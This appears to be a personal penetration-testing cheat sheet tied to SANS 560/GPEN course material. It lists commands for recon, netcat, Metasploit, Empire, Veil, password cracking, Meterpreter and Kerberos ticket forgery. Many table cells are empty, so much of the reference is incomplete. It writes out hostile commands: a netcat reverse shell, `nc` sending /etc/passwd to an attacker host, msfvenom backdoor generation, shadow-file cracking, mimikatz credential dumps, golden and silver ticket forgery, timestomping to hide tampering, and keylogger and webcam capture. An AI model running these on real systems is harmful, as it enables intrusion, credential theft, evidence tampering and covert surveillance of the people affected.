General Recon

| Command | Description |
|---|---|
| `fping -g x.x.x.0 x.x.x.254 -a` | Ping sweep |

Linux traceroute options

| Option | Description |
|---|---|
| | Forces IPv4 |
| | Forces IPv6, same as the traceroute6 command |
| | Uses ICMP echo |
| | Uses TCP SYN |
| | Starts from the hop specified instead of 1 |
| | Routes packets through the gateway specified instead of the default |
| | Specifies the maximum number of hops; default is 30 |
| | Specifies not to resolve IP addresses to hostnames |
| | Specifies the wait time, which can be in seconds or relative to the reply time between hops |
| | Specifies the port |
DNS Query

nslookup

| Command | Description |
|---|---|
| `nslookup -norecurse -type=A google.com DNS_SRVR_IP` | DNS snooping (nonrecursive query) |
| `server [serverIPaddr or name]` | Use a specific server |
| | Set DNS record type |
| | Perform a zone transfer of all records for a given domain |
| `ls -d [target_domain] [> filename]` | Store zone transfer output in a file |
| | View file |
| `set norecurse` | No recursive query (RD=0) |

dig

| Command | Description |
|---|---|
| `dig @[name server] [domain name] [record type]` | dig command syntax |
| `dig +nocomments @192.168.1.50 lab.local -t AXFR` | Test whether the server allows anonymous zone transfers |
Netcat

Flags

| Flag | Description |
|---|---|
| | Listen mode (default is client) |
| | Listen harder (Windows only): make a persistent listener |
| | UDP mode (default is TCP) |
| | Local port (in listen mode, this is the port listened on for connections; in client mode, this is the source port for packets sent) |
| | Program to execute after connection occurs |
| | Don't resolve names |
| | Zero-I/O mode: don't send any data, just emit packets |
| | Timeout for connects, waits for N seconds |
| | Be verbose, printing when a connection is made |
| | Executes a command upon connection |
| | Be verbose, printing when connections are made, dropped, and so on |

General

| Command | Description |
|---|---|
| | Server listen, verbosity, no DNS, on port XX |

SHELLS

| Command | Description |
|---|---|
| | Client reverse shell |
| `rm -f /tmp/f ; mkfifo /tmp/f ; cat /tmp/f\|/bin/sh -i 2>&1\|nc $RHOST $RPORT >/tmp/f` | netcat -e alternative example |
| `nc -l -p [allowed_inbound_port] 0<backpipe \| nc 127.0.0.1 22 1>backpipe` | On target |
| `ssh login_name@[targetmachine] -p [allowed_inbound_port]` | Attacker's machine to connect |

A really good explanation for this is in the 560.3 book, p. 152.

Send files

| Command | Description |
|---|---|
| | Set up listener and output file |
| `nc -w 3 attackerIP 8080 < /etc/passwd` | Sends file to netcat listener with 3 seconds timeout |

Scan ports

| Command | Description |
|---|---|
| | Test 1 port |
| `nc -v -w 2 -z IP_Address port_range` | Port range |
| `echo "" \| nc -v -n -w1 [targetIP] [port-range]` | A port scanner that harvests banners |

Other uses

| Command | Description |
|---|---|
| `while (true); do nc -vv -z -w3 [target_IP] [target_port] > /dev/null && echo -e "\x07"; sleep 1; done` | Service-is-alive heartbeat |
| `while nc -vv -z -w3 [target_IP] [target_port] > /dev/null; do echo "Service is ok"; sleep 1; done; echo "Service is dead"; echo -e "\x07"` | Service-is-dead notification |

Alternative

| Command | Description |
|---|---|
| `nc -n -v -l -p 2222 < /tmp/winauth.pcap` | Set up listener that will send the file |
| `nc.exe -n -v -w3 [YourLinuxIPaddr] 2222 >C:\folder\winauth.pcap` | Client to capture and save the file |
TCPDUMP (Monitoring)

General

| Option | Description |
|---|---|
| | Start capturing traffic |
| | Use numbers instead of names for machines |
| | Use numbers for machines and ports |
| | Sniff on a particular interface (-D lists interfaces) |
| | Be verbose |
| | Dump packets to a file (use -r to read the file later) |
| | Print hex |
| | Print hex and ASCII |
| | Print ASCII |
| | Sniff this many bytes from each frame, instead of the default |

Protocol: `ether`, `ip`, `ip6`, `arp`, `rarp`, `tcp`, `udp` (protocol type)

Type

| Filter | Description |
|---|---|
| | Only give me packets to or from that host |
| | Only packets for a given network |
| | Only packets for that port |
| | Only packets in that range of ports |

Direction

| Filter | Description |
|---|---|
| | Only give me packets from that host or port |
| | Only give me packets to that host |

Use `and` / `or` to combine these together; wrap in parentheses to group elements together.
Hashcat

| Command | Description |
|---|---|
| `hashcat -m 1800 -a 0 -o found1.txt crack1.hash 500_passwords.txt` | Crack Linux SHA512 password with dictionary |
| `hashcat --force -m 13100 -a 0 lab3.hashcat /path/to/Dict.txt --show` | Crack Kerberos service ticket for account password |

PowerSploit/PowerView

| Command | Description |
|---|---|
| | Requests service tickets for kerberoast-able accounts and returns extracted ticket hashes |
Metasploit

Create handler listener

| Command | Description |
|---|---|
| `use exploit/multi/handler` | |
| `set payload windows/x64/meterpreter/reverse_https` (or `windows/meterpreter/reverse_tcp`) | |
| | Run in background |

PS session with valid creds

| Command | Description |
|---|---|
| `use auxiliary/admin/smb/psexec_command` | |
| `set command "ipconfig or any command"` | |

Create backdoor (recognized by Defender :( )

| Command | Description |
|---|---|
| `msfvenom -p windows/shell/reverse_tcp LHOST=[AttackerIP] LPORT=8080 -f exe > /tmp/file.exe` | |
| `msfvenom -p windows/x64/meterpreter_reverse_https LHOST=AttackerIP LPORT=443 -f exe -o pwned.exe` | |

Others

| Command | Description |
|---|---|
| | Get a list of sessions |
| | Interact (-i) with session number [N] |
| | Background session |
| | Get background jobs |
| `db_import /path/to/file/nmap.xml` | Import scans from nmap |
| `hosts -m "Windows 10" 192.168.1.10` | Add comment to host |
| | Show UP hosts with ports 135,445 |
| | List help for sessions command |
| | Kill a session |
Empire

| Command | Description |
|---|---|
| | Set up an Empire HTTP listener |
| `usestager windows/launcher_bat` | |
| | Choose an agent |
| `download C:\Users\alice\Desktop\some.txt` | Transfer file from agent PC |

Timestomping

| Command | Description |
|---|---|
| | Upload content from /tmp to actual session directory |
| `usemodule management/timestomp` | Load timestomp module |
| `set ALL 03/02/2020 5:28 pm` | Define time to be set in all datetime file properties |
| `set FilePath bank_login_information.txt` | Set target file to be tampered with |
| | Run module |

Others

| Command | Description |
|---|---|
| `/opt/Empire-master/downloads/` | Empire downloads location |
| `shell powershell Get-ChildItem` | Run PowerShell command |

General

| Command | Description |
|---|---|
| `?` | Get command suggestions |
| `searchmodule privesc` | Search for modules |

Configure a listener

| Command | Description |
|---|---|
| `listeners` | Get a list of our listeners |
| `options` | Options we have for our listeners |
| `set StagingKey [Some_Secret_Value]` | Configure a custom staging key for encrypting communications |
| `set DefaultDelay 1` | Time between callbacks from our agent |
| `execute` | Launch listener |
| `list` | Check out our listener |

Deploy an agent

| Command | Description |
|---|---|
| `usestager` | Create and deploy an agent ([space][TAB-TAB] to see available stagers) |
| `usestager launcher_bat` | Select stager |
| `info` | Get info for actual stager |
MSFDB - Metasploit Database

Most useful database commands

| Command | Description |
|---|---|
| `db_connect [connect_string]` | Connects to a database |
| | Disconnects from database |
| | Selects the database type |
| | Displays the status of the database |
| | Exports database contents into a file, either xml (with hosts, ports, vulnerabilities, and more) or pwdump (with pilfered credentials) |
| | Get list of hosts discovered |
| | Get list of vulns that were found in scanned hosts |
| | Get list of services running in gained hosts |
| | Manually add hosts |
| `services --add -p [port] -r [proto] -s [name] [host1,host2,...]` | Manually add services running in hosts |
| `notes --add -t [type] -n '[note_text]' [host1,host2,...]` | Manually add notes to a host |

If you delete a host, any services and vulns corresponding to that host_id will also disappear.

| Command | Description |
|---|---|
| `db_nmap -sT 10.10.10.10 --packet-trace` | Invoke Nmap directly from the msfconsole |
| | Import data; automatically recognizes the file type (Nmap xml, Amap, Nexpose, Qualys, Nessus) |
| | Search for any hosts associated with linux; -S works for other items (vulns) as well |
| | Set result as RHOSTS variable value |
| | Look for vulnerabilities based on port number |
Veil-Evasion

Start Veil-Evasion

| Command | Description |
|---|---|
| `cd /opt/Veil-Evasion` or `/usr/share/veil` | |

General

| Command | Description |
|---|---|
| | Get a list of all the different payloads that the tool can generate |
| `info powershell/meterpreter/rev_https` | Get more information about any of the payloads |
| | Clean out any leftover cruft from previous use of Veil-Evasion |

Generate payload

| Command | Description |
|---|---|
| `use powershell/meterpreter/rev_https` | Select the payload you want to generate |
| | List options for actual item |
| | Create the payload file |

Generated files

| Command | Description |
|---|---|
| | This is the payload itself |
| | This is the Metasploit configuration file (also known as a handler file) for a multi/handler waiting for a connection from our payload |
| | Exit Veil-Evasion |
| `/usr/share/veil-output/source` | Veil-Evasion output directory |
traceroute

Options

| Option | Description |
|---|---|
| | Set the initial TTL for the first packet |
| | Specify a loose source route (8 maximum hops) |
| | Use ICMP Echo Request instead of UDP |
| | Use TCP SYN instead of UDP (very useful!), with default dest port 80 |
| | Set the maximum number of hops |
| | Print numbers instead of names |

Port

| Option | Description |
|---|---|
| | For UDP, set the base destination UDP port and increment |
| | For TCP, set the fixed TCP destination port to use, defaulting to port 80 (no incrementing) |
| | Wait for N seconds before giving up and writing * (default is 5) |
| | Force use of IPv4 (by default, chooses 4 or 6 based on dest addr) |
| | Force use of IPv6 |
John the Ripper

General

| Command | Description |
|---|---|
| `john.pot` file | Cracked password store |
| `john.rec` file | Stores John's current status |
| `john --restore` | Picks up where it left off based on the contents of the john.rec file |
| `john --test` | Check speed of system |
| `john hash.txt` | Run John against the hash.txt file |
| `john --show [password_file]` | Compare which passwords John has already cracked from a given password file against its john.pot file |

Cracking LANMAN hashes

| Command | Description |
|---|---|
| | By default, John will focus on the LANMAN hashes |

Cracking Linux passwords

| Command | Description |
|---|---|
| `cp /etc/passwd /tmp/passwd_copy` | Copy passwd file to your working directory |
| `cp /etc/shadow /tmp/shadow_copy` | Copy shadow file to your working directory |
| `./unshadow passwd_copy shadow_copy > combined.txt` | Use the unshadow script to combine account info from /etc/passwd with password information from /etc/shadow |
| `john combined.txt` | Run John against the combined file |
| `cat ~/.john/john.pot` | Look at the results in the john.pot file |
pw-inspector (Password Inspector)

| Option | Description |
|---|---|
| `-i` | Input file |
| `-o` | Output file |
| `-m [n]` | The minimum number of characters to use for a password is n |
| `-M [N]` | Remove all words longer than N characters |
| `-c [count]` | How many password criteria a given word must meet to be included in the list |
| `-l` | The password must contain at least one lowercase character |
| `-u` | The password must contain at least one uppercase character (to specify a mixed case requirement, configure `-c 2 -l -u`) |
| `-n` | The password must contain at least one number |
| `-p` | The password must contain at least one printable character that is neither alphabetic nor numeric, which includes !@#$%^&*() |
| `-s` | The password must include characters not included in the other lists (such as nonprintable ASCII characters) |
Meterpreter

Basic commands

| Command | Description |
|---|---|
| | Display a help menu |
| | Quit the Meterpreter |
| | Show name, OS type |
| | Self-explanatory |
| | Read or write to the Registry |

File system commands

| Command | Description |
|---|---|
| | Navigate directory structure |
| | Change local directories on attacker machine |
| | Show the current working directory |
| | List the directory contents, even for Windows |
| | Display a file's contents |
| | Move a file to or from the machine |
| | Make or remove directories |
| | Edit a file using default editor |

Process commands (560.3 Page 92)

| Command | Description |
|---|---|
| | Returns the process ID that Meterpreter is running in |
| | Returns the user ID that the Meterpreter is running with |
| | Process list |
| | Terminate a process |
| | Runs a given program channelized (-c) and hides the process window (-H) |
| `migrate [destination_process_ID]` | Jumps to a given destination process ID. Target process must have the same or lesser privileges; may be a more stable process; when inside the process, can access any files that it has a lock on |

Network commands

| Command | Description |
|---|---|
| | Show network config |
| | Displays routing table, adds/deletes routes |
| `portfwd add -l 1111 -p 22 -r Target2` | See SANS 560.3 Exploitation, page 67, for better understanding |

On-target machine commands

| Command | Description |
|---|---|
| `SC` | |
| | Show how long the user at the console has been idle |
| `uictl [enable/disable] [keyboard/mouse]` | Turn on or off user input devices |

Webcam and mic commands

| Command | Description |
|---|---|
| | Lists installed webcams |
| | Snaps a single frame from the webcam as a JPEG; can specify JPEG image quality from 1 to 100, with a default of 50 |
| | Records audio for N seconds (-d N) and stores it in a wav file in the Metasploit .msf4 directory by default |

Make sure you get written permission before activating either feature.

Keystroke logger

| Command | Description |
|---|---|
| | Poll every 30 milliseconds for keystrokes entered into the system |
| | Flushes 1 megabyte of buffered captured keystrokes to the attacker's Meterpreter screen |
| | Tells the Meterpreter to stop gathering all keystrokes |

Pivoting using Metasploit's route command

| Command | Description |
|---|---|
| `set PAYLOAD windows/meterpreter/reverse_tcp` | |
| | Background the session; will display the Meterpreter session ID (sid) |
| `route add [victim2_subnet] [netmask] [Sid]` | Direct any of its packets for a given target machine or subnet through that Meterpreter session |

Do not confuse the Metasploit (msf) route command with the Meterpreter route command. The latter is used to manage the routing tables on a target box that has been compromised using the Meterpreter payload. The msf route command is used to direct all traffic for a given target subnet from the attacker's Metasploit machine through a given Meterpreter session on a compromised victim machine to another potential victim.

Additional modules

| Command | Description |
|---|---|
| | Load additional modules |

Others

| Command | Description |
|---|---|
| `run schtasksabuse -c "[command1][,command2]..." -t [targetIP]` | Script that automates Windows schtasks task creation |
| | Uses Meterpreter's process credentials (add -u and -p for other credentials) |
| `load kiwi` | Load the mimikatz Kiwi Meterpreter extension on the target machine |
| `creds_all` | Grab credentials |
GPG

| Command | Description |
|---|---|
| `gpg -d -o <OutputFileName> <EncryptedFileName>` | Decrypt a file |
OVER-PASS-THE-HASH

1. Perform the AS-REQ (encrypting the timestamp with the password hash) to get a TGT
2. Perform a TGS-REQ to the KDC to get a TGS
3. Use the TGS to impersonate the password hash owner and use a service
Golden Ticket ATTACK

Requirements

- (e.g. KRBTGT NTLM hash)
- Domain admin account name
- SID of domain admin account

Commands

| Command | Description |
|---|---|
| `.\mimikatz kerberos::golden /admin:ADMINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH` | |
| `.\mimikatz kerberos::ptt file.txt` | Create a golden ticket from file with PTT |
| | Get current session ticket details |
| | Export ticket to a .kirbi file |
| `kerberos::ptt file.kirbi` | Load / pass the ticket |
Silver Ticket ATTACK

Requirements

- Target server's FQDN
- SPN
- NTLM hash for the service (computer account or user account)

Steps

| Command | Description |
|---|---|
| | Get domain/SID |
| `invoke-Kerberoast.ps1` | Get SPN and service user password hash for cracking |
| `mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit` | Get service password hash with Mimikatz (if you have access to the server hosting the vulnerable service) |
| `hashcat -m 13100 hash.txt dicti.txt` (hash.txt holds the `$krb5tgs$6$acct$svc/HOST:port$XXXX…XXX` line) | Get unencrypted service password with hashcat (if we didn't get the NTLM hash) and hash it to NTLM |
| `Import-Module DSInternals; $pwd = ConvertTo-SecureString 'P@$$w0rd' -AsPlainText -Force; ConvertTo-NTHash $pwd` | Hash cleartext password to NTLM |
| `mimikatz "kerberos::golden /admin:ImAdmin /id:1106 /domain:lab.adsecurity.org /sid:S-1-5-21-XXXXX /target:EXCHANGE.lab.local /rc4:NTLMHash /service:ServiceSPN /ptt" exit` | Forge TGS to authenticate to the target service |
| `misc::cmd ; klist ;` then use a command to connect to that specific service, for example `Find-InterestingFile -Path \\FileServer1.domain.com\S$\shares\` | Authenticate to the local service with creds and TGS (e.g. mimikatz) |

Trolling

Faking RIDs

| Option | Description |
|---|---|
| | 1106 is "Anakin" |
| `/id:1159` | 1159 is "Vader" |
| `/user:Anakin` | Result: User: Anakin; real context user: Vader |
| `/groups:512,513,518,519 /id:9999 /user:yourmom` | lulz |
Mimikatz

Command reference for ticket attacks

| Option | Description |
|---|---|
| | Domain's FQDN |
| | SID of the domain |
| | Username to impersonate |
| | Group RIDs the user is a member of (the first is the primary group); default: 513,512,520,518,519 for the well-known Administrator groups |
| | Provide a path and name for saving the Golden Ticket file for later use, or use /ptt to immediately inject the golden ticket into memory for use |
| | As an alternate to /ticket, use this to immediately inject the forged ticket into memory for use |
| | User RID. Mimikatz default is 500 (the default Admin account RID) |
| | The start offset when the ticket is available (generally set to -10 or 0 if this option is used). Mimikatz default value is 0 |
| | Ticket lifetime. Mimikatz default value is 10 years (~5,262,480 minutes). Active Directory default Kerberos policy setting is 10 hours (600 minutes) |
| | Maximum ticket lifetime with renewal. Mimikatz default value is 10 years (~5,262,480 minutes). Active Directory default Kerberos policy setting is 7 days (10,080 minutes) |
Scapy (Packet crafting)

GPEN AIO Book - Lab 3-4: Scapy Introductory

| Command | Description |
|---|---|
| | Starts library |
| | Get help for specific function |
| | Define blank packet |
| | Show packet info |
| | Show packet info |
| | Show packet info |
| | View just the data |
| `p[IP].src="ipaddress"` | Set src address |
| `p[IP].dst="ipaddress"` | Set dst address |
| | Set src port |
| | Set dst port |
| | Packet structure |
Metadata Analysis

| Command | Description |
|---|---|
| `./exiftool t/images/ExifTool.jpg >/root/exif.out` | Execute exiftool against ExifTool.jpg |
| `strings -n 8 file.txt` | Shows only strings at least eight characters long |
Recon-ng commands for whois_pocs

| Command | Description |
|---|---|
| `marketplace install all ; exit` | |
| `modules load recon/domains-contacts/whois_pocs` | |
| `options set SOURCE example.com` | |
Cron

| Command | Description |
|---|---|
| | List job entries |
| | Edit job entries |